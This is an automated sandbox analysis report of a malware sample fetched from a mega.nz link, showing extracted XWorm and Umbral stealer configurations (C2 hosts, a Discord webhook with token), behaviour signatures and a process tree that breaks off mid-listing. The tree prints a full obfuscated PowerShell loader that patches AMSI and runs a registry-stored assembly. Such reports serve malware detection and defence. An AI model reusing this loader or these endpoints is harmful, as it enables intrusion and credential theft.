Analysis

  • max time kernel
    718s
  • max time network
    719s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-09-2024 19:05

Errors

Reason
Machine shutdown

General

  • Target

    https://mega.nz/file/7cdxFK4L#Io2Hue4hwSOKhugcwhvAvNvz7ViKQqmBYX7YynYEe58

Malware Config

Extracted

Family

xworm

Version

3.0

C2

spain-trail.gl.at.ply.gg:51770

Mutex

q2KqNRza4QGi0rMH

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

xworm

Version

5.0

C2

greater-thoughts.gl.at.ply.gg:45129

Mutex

1nTu2dtHQwobJZ3T

Attributes
  • Install_directory

    %AppData%

  • install_file

    svart.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1290029641578578002/m1fVsUigNqnmg9qL11KB2Dp0cwdGriuTSOUVDC73kL7e21WxRUV92BT2hxAtiAnCrbXG

Signatures

  • Detect Umbral payload 1 IoCs
  • Detect Xworm Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 57 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1020
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1ea4b04f-8686-4485-94b6-e680f8abb971}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5500
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1012
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1096
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1132
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1144
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2780
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:veUGIMwcrHvM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CwUgMgpOBeQMKR,[Parameter(Position=1)][Type]$FvewIAgFfL)$jFEfnFrbxAX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yDe'+[Char](108)+''+[Char](101)+'g'+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+','+''+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'ss',[MulticastDelegate]);$jFEfnFrbxAX.DefineConstructor('R'+[Char](84)+''+'S'+''+'p'+'eci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CwUgMgpOBeQMKR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$jFEfnFrbxAX.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','Publ'+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+'S'+'i'+'g'+','+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+'r'+'t'+'ual',$FvewIAgFfL,$CwUgMgpOBeQMKR).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $jFEfnFrbxAX.CreateType();}$JqbdIqGfVUjFv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+[Char](110)+'3'+'2'+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'od'+'s'+'');$OkxgCPCJiEFrRJ=$JqbdIqGfVUjFv.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+'l'+'ic,St'+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JDdkEsmihuYRGOUKRZK=veUGIMwcrHvM @([String])([IntPtr]);$xqZOqNnEAdVLlanIfvmMPZ=veUGIMwcrHvM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qbfJdZgBFOY=$JqbdIqGfVUjFv.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+'o'+[Char](100)+'u'+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dl'+[Char](108)+'')));$evETqPPXdFrgOJ=$OkxgCPCJiEFrRJ.Invoke($Null,@([Object]$qbfJdZgBFOY,[Object](''+[Char](76)+''+[Char](111)+'adLib'+[Char](114)+''+[Char](97)+''+[Char](114)+'yA')));$ZgStBYMgWIHdABdCj=$OkxgCPCJiEFrRJ.Invoke($Null,@([Object]$qbfJdZgBFOY,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'P'+'r'+''+[Char](111)+'t'+[Char](101)+'c'+'t'+'')));$fhnFGNR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($evETqPPXdFrgOJ,$JDdkEsmihuYRGOUKRZK).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$YJrSnqxVIcLpIrDTe=$OkxgCPCJiEFrRJ.Invoke($Null,@([Object]$fhnFGNR,[Object]('A'+'m'+''+'s'+''+'i'+''+'S'+'ca'+[Char](110)+''+'B'+''+'u'+'ff'+[Char](101)+''+[Char](114)+'')));$OkdnkeuNCq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZgStBYMgWIHdABdCj,$xqZOqNnEAdVLlanIfvmMPZ).Invoke($YJrSnqxVIcLpIrDTe,[uint32]8,4,[ref]$OkdnkeuNCq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YJrSnqxVIcLpIrDTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZgStBYMgWIHdABdCj,$xqZOqNnEAdVLlanIfvmMPZ).Invoke($YJrSnqxVIcLpIrDTe,[uint32]8,0x20,[ref]$OkdnkeuNCq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](115)+'v'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1460
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:5448
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Indicator Removal: Clear Windows Event Logs
                      PID:1232
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1244
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1364
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1372
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1428
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2552
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault4872d529h1b44h4c6aha2bch286dd6a232ef
                                    3⤵
                                      PID:5228
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffef2b046f8,0x7ffef2b04708,0x7ffef2b04718
                                        4⤵
                                          PID:5300
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,10767734870791815824,17912984514303666002,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                          4⤵
                                            PID:5516
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,10767734870791815824,17912984514303666002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5528
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,10767734870791815824,17912984514303666002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
                                            4⤵
                                              PID:5564
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulte08bab58h64d6h4253hab79hd471898fbbf0
                                            3⤵
                                              PID:1196
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffef2b046f8,0x7ffef2b04708,0x7ffef2b04718
                                                4⤵
                                                  PID:832
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,2798523448710636027,4708944608061064825,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
                                                  4⤵
                                                    PID:4936
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,2798523448710636027,4708944608061064825,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3056
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,2798523448710636027,4708944608061064825,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
                                                    4⤵
                                                      PID:6128
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                1⤵
                                                  PID:1468
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                  1⤵
                                                    PID:1480
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                    1⤵
                                                      PID:1560
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                      1⤵
                                                        PID:1656
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                        1⤵
                                                          PID:1708
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                          1⤵
                                                            PID:1760
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                            1⤵
                                                              PID:1796
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                              • Modifies Internet Explorer settings
                                                              PID:1876
                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                C:\Windows\system32\AUDIODG.EXE 0x49c 0x150
                                                                2⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1256
                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                C:\Windows\system32\AUDIODG.EXE 0x49c 0x150
                                                                2⤵
                                                                  PID:4364
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                1⤵
                                                                  PID:1972
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                    PID:1212
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    1⤵
                                                                      PID:1852
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                      1⤵
                                                                        PID:2012
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                        1⤵
                                                                          PID:2076
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                          1⤵
                                                                            PID:2224
                                                                          • C:\Windows\System32\spoolsv.exe
                                                                            C:\Windows\System32\spoolsv.exe
                                                                            1⤵
                                                                              PID:2232
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                              1⤵
                                                                                PID:2412
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2576
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                  1⤵
                                                                                    PID:2596
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                    1⤵
                                                                                      PID:2604
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                      1⤵
                                                                                      • Drops file in System32 directory
                                                                                      PID:2744
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                      1⤵
                                                                                        PID:2804
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                        1⤵
                                                                                          PID:2828
                                                                                        • C:\Windows\sysmon.exe
                                                                                          C:\Windows\sysmon.exe
                                                                                          1⤵
                                                                                            PID:2840
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                            1⤵
                                                                                              PID:2884
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                              1⤵
                                                                                                PID:2892
                                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3136
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                  1⤵
                                                                                                    PID:3340
                                                                                                  • C:\Windows\Explorer.EXE
                                                                                                    C:\Windows\Explorer.EXE
                                                                                                    1⤵
                                                                                                      PID:3348
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/7cdxFK4L#Io2Hue4hwSOKhugcwhvAvNvz7ViKQqmBYX7YynYEe58
                                                                                                        2⤵
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2496
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff07c0cc40,0x7fff07c0cc4c,0x7fff07c0cc58
                                                                                                          3⤵
                                                                                                            PID:4244
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1852 /prefetch:2
                                                                                                            3⤵
                                                                                                              PID:3960
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2156 /prefetch:3
                                                                                                              3⤵
                                                                                                                PID:1776
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2252 /prefetch:8
                                                                                                                3⤵
                                                                                                                  PID:4592
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3132 /prefetch:1
                                                                                                                  3⤵
                                                                                                                    PID:3012
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                    3⤵
                                                                                                                      PID:5024
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4356,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4648 /prefetch:8
                                                                                                                      3⤵
                                                                                                                        PID:4500
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4856,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                        3⤵
                                                                                                                          PID:1268
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5144,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5156 /prefetch:8
                                                                                                                          3⤵
                                                                                                                            PID:5112
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
